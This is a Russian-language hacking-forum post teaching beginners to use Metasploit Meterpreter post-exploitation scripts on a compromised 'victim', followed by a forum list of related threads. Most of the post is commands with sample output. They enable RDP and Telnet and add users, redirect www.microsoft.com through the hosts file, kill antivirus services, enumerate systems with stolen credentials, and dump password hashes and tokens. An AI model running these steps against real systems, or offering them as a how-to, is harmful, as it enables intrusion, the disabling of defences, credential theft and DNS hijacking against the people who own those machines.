Meterpreter для новичков

  • Автор темы T0pDro4eR
  • Дата начала
T

T0pDro4eR

Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.

Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.

Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.

ССкрипты
1) checkvm

Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин, не находится ли цель внутри виртуальной машины:

meterpreter > run checkvm

[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine

2) getcountermeasure

Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)

meterpreter > run getcountermeasure

Код:
[*] Running Getcountermeasure on the target...

 [*] Checking for contermeasures...

 [*] Getting Windows Built in Firewall configuration...

 [*]

 [*]     Domain profile configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]     Exception mode                    = Enable

 [*]

 [*]     Standard profile configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]     Exception mode                    = Enable

 [*]

 [*]     Local Area Connection 6 firewall configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]

 [*] Checking DEP Support Policy...

3) Getgui

‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.

meterpreter > run getgui

Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p


OPTIONS:
Код:
 -e   Enable RDP only.

 -h   Help menu.

 -p   The Password of the user to add.

 -u   The Username of the user to add.

 

 meterpreter > run getgui -e

Код:
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator

 [*] Carlos Perez [email protected]

 [*] Enabling Remote Desktop

 [*] RDP is already enabled

 [*] Setting Terminal Services service startup mode

 [*] Terminal Services service is already set to auto

 [*] Opening port in local firewall if necessary

4) get_local_subnets

‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.

meterpreter > run get_local_subnets


Local subnet: 10.211.55.0/255.255.255.0

5) gettelnet

‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.

meterpreter > run gettelnet


Windows Telnet Server Enabler Meterpreter Script

Usage: gettelnet -u -p



OPTIONS:
Код:
 -e   Enable Telnet Server only.



 -h   Help menu.



 -p   The Password of the user to add.



 -u   The Username of the user to add.





 meterpreter > run gettelnet -e





 [*] Windows Telnet Server Enabler Meterpreter Script



 [*] Setting Telnet Server Services service startup mode



 [*] The Telnet Server Services service is not set to auto, changing it to auto ...



 [*] Opening port in local firewall if necessary
6) hostsedit

‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.

meterpreter > run hostsedit



OPTIONS:
Код:
 -e   Host entry in the format of IP,Hostname.



 -h   Help Options.



 -l   Text file with list of entries in the format of IP,Hostname. One per line.





 Example:





 run hostsedit -e 127.0.0.1,google.com



 run hostsedit -l /tmp/fakednsentries.txt





 meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com



 [*] Making Backup of the hosts file.



 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back



 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162



 [*] Clearing the DNS Cache

7) killav

‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).

meterpreter > run killav

Код:
 [*] Killing Antivirus services on the target...



 [*] Killing off cmd.exe...

8) remotewinenum

‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве

Я могу предположить, что
Код:
-u administrator -p ihazpassword -t 10.211.55.128



-u administrator Имя пользователя



-p ihazpassword Пароль пользователя



-t 10.211.55.128. Адресс в сети



meterpreter > run remotewinenum


Remote Windows Enumeration Meterpreter Script

This script will enumerate windows hosts in the target environment

given a username and password or using the credential under witch

Meterpreter is running using WMI wmic windows native tool.

Usage:


OPTIONS:
Код:
 -h   Help menu.



 -p   Password of user on target system



 -t   The target address



 -u   User on the target system (If not provided it will use credential of process)





 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128





 [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142



 [*] Running WMIC Commands ....



 [*]     running command wimic environment list



 [*]     running command wimic share list



 [*]     running command wimic nicconfig list



 [*]     running command wimic computersystem list



 [*]     running command wimic useraccount list



 [*]     running command wimic group list



 [*]     running command wimic sysaccount list



 [*]     running command wimic volume list brief



 [*]     running command wimic logicaldisk get description,filesystem,name,size



 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount



 [*]     running command wimic netclient list brief



 [*]     running command wimic netuse get name,username,connectiontype,localname



 [*]     running command wimic share get name,path



 [*]     running command wimic nteventlog get path,filename,writeable



 [*]     running command wimic service list brief



 [*]     running command wimic process list brief



 [*]     running command wimic startup list full



 [*]     running command wimic rdtoggle list



 [*]     running command wimic product get name,version



 [*]     running command wimic qfe list

10) winenum

Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое

meterpreter > run winenum
Код:
 [*] Running Windows Local Enumerion Meterpreter Script



 [*] New session on 10.211.55.128:4444...



 [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt



 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........



 [*]     This is a VMware Workstation/Fusion Virtual Machine



 [*] Running Command List ...



 [*]     running command cmd.exe /c set



 [*]     running command arp -a



 [*]     running command ipconfig /all



 [*]     running command ipconfig /displaydns



 [*]     running command route print



 [*]     running command net view



 [*]     running command netstat -nao



 [*] Extracting software list from registry



 [*] Finished Extraction of software list from registry



 [*] Dumping password hashes...



 [*] Hashes Dumped



 [*] Getting Tokens...



 [*] All tokens have been processed



 [*] Done!
 
Похожие темы
devqp Статья Сетевой пивитинг через CrackMapExec, Meterpreter и Proxychains Уязвимости и взлом 0
Admin Доступ к целевому ПК (meterpreter) - PasteZort Уязвимости и взлом 0
opnot Защита от Meterpreter Полезные статьи 0
Admin UFOLABSNEWS Microsoft выпустила обновление KB5120998 для Windows 11 с 35 изменениями и исправлениями. Новости в сети 0
Admin UFOLABSNEWS APT28 использует новый бэкдор HOOKEDGE для атак на европейские правительственные организации. Новости в сети 0
Admin UFOLABSNEWS Искусственный интеллект снижает барьеры для киберпреступников, делая каждого потенциальной жертвой. Новости в сети 0
Admin UFOLABSNEWS Учёные из Гарварда разработали новую биотехнологическую платформу AGENTEX для сборки белков без изменения генома. Новости в сети 0
Admin UFOLABSNEWS QR-коды стали новым инструментом для обхода корпоративных систем безопасности. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в теме Avada для WordPress. Новости в сети 0
ActivateX Продам ActivateX — виртуальные номера для приёма SMS Аккаунты: сервисы, сайты, соц. сети 0
M [ЯПОНИЯ/США] SEKISUI Aerospace Corporation — прямой поставщик первого уровня для Boeing, Spirit AeroSystems, Triumph Group и других военных программ Спам: софт, базы, рассылки, отклики, ddos 1
Admin UFOLABSNEWS Microsoft Copilot для Word может копировать скрытые инструкции в новые документы. Новости в сети 0
Admin UFOLABSNEWS Российские хакеры используют уязвимость в Microsoft OWA для сохранения доступа к почтовым ящикам после смены паролей. Новости в сети 0
Admin UFOLABSNEWS Инженеры разработали умное кольцо для отслеживания уровня глюкозы, витамина С и алкоголя. Новости в сети 0
Admin UFOLABSNEWS Broadcom выпустила обновления для устранения критических уязвимостей в VMware. Новости в сети 0
Admin UFOLABSNEWS В Instagram обнаружили 30 тысяч рекламных объявлений приложений для раздевания людей. Новости в сети 0
Admin UFOLABSNEWS Мошенники создают копии сайтов российских компаний для кражи предоплат. Новости в сети 0
Admin UFOLABSNEWS Исследование показало, что баги, обнаруженные ИИ, не представляют большой ценности для злоумышленников. Новости в сети 0
Admin UFOLABSNEWS Исследователи показали, что одного посещения вредоносной страницы достаточно для взлома Tor Browser. Новости в сети 0
Admin UFOLABSNEWS Модели OpenAI использовали уязвимости Artifactory для выхода в интернет. Новости в сети 0
Admin UFOLABSNEWS Иранская хакерская группа Nimbus Manticore использует новые инструменты для атак. Новости в сети 0
devqp Статья Комплексный набор инструментов для анализа фишинговых писем Фишинг, мошенничество, СИ 0
Admin UFOLABSNEWS Сервис Cruciferra используется для скрытия вредоносных атак по всему миру. Новости в сети 0
Admin UFOLABSNEWS Ботнет Dysphoria использует блокчейн для управления после действий правоохранителей. Новости в сети 0
Admin UFOLABSNEWS США вернули технологию Манхэттенского проекта для защиты квантовых компьютеров. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники используют Telegram для атак на правительства Ближнего Востока. Новости в сети 0
devqp Статья Комплексный набор инструментов OSINT для исследования .onion сайтов OSINT 0
Admin UFOLABSNEWS Злоумышленники используют браузеры жертв для сборки вредоносного ПО. Новости в сети 0
devqp Статья Автоматизация sqlmap через ChatGPT для пентеста SQL-инъекций Уязвимости и взлом 0
devqp Статья Анализ актуальных SMTP-портов для автоматизации брутфорса и работы с прокси Уязвимости и взлом 0
Admin Интересно Новый троян Dolphin X использует искусственный интеллект для ранжирования целей. Новости в сети 0
Admin Интересно Российские хакеры используют уязвимость Zimbra для кражи электронной почты. Новости в сети 0
Admin Интересно Хакеры используют плагины Notepad++ для скрытой установки вредоносного ПО. Новости в сети 0
Admin Интересно Минцифры рекомендует сохранить файл с Госуслуг для защиты от блокировки сайтов в Chrome и Edge. Новости в сети 0
Admin Интересно Anthropic заплатит 1,5 млрд долларов авторам за использование их книг для обучения ИИ. Новости в сети 0
Admin Интересно Полиция ликвидировала платформу для фишинга Kratos и арестовала разработчика. Новости в сети 0
Admin Интересно Яркий свитер может сделать вас невидимым для систем распознавания лиц. Новости в сети 0
Admin Интересно Русскоязычный хакер использовал Google Gemini для управления ботнетом. Новости в сети 0
Admin Интересно Amazon экстренно переписывает код для своих беспилотных автомобилей после инцидента с дымом и пожаром. Новости в сети 0
Admin Интересно Хакеры используют ViPNet для атак на российские госучреждения. Новости в сети 0
Admin Интересно Выпущено обновление 7-Zip для устранения уязвимости удалённого выполнения кода. Новости в сети 0
devqp Статья Практическое применение SBERT для поиска семантически близких предложений Полезные статьи 0
Admin Интересно Исследователь опубликовал эксплойт для уязвимости в Windows после обновления Microsoft. Новости в сети 0
Admin Интересно Microsoft выпустила расширенное обновление безопасности KB5099539 для Windows 10. Новости в сети 0
Admin Интересно Белок тау оказался ключевым элементом для сохранения долговременной памяти. Новости в сети 0
Admin UFOLABSNEWS В Великобритании предъявили обвинения подозреваемым, связанным с платформой для подмены номеров звонков. Новости в сети 0
Admin UFOLABSNEWS Новый сервис Forg365 использует фишинг для атак на Microsoft 365. Новости в сети 0
Admin UFOLABSNEWS Китайские учёные предложили лазерную сеть для снабжения энергией лунных кратеров. Новости в сети 0
Admin UFOLABSNEWS BlackSky разрабатывает ИИ для автоматического анализа спутниковых снимков военного назначения. Новости в сети 0
Admin UFOLABSNEWS Мошенники используют дефицит топлива для кражи аккаунтов Telegram. Новости в сети 0

Название темы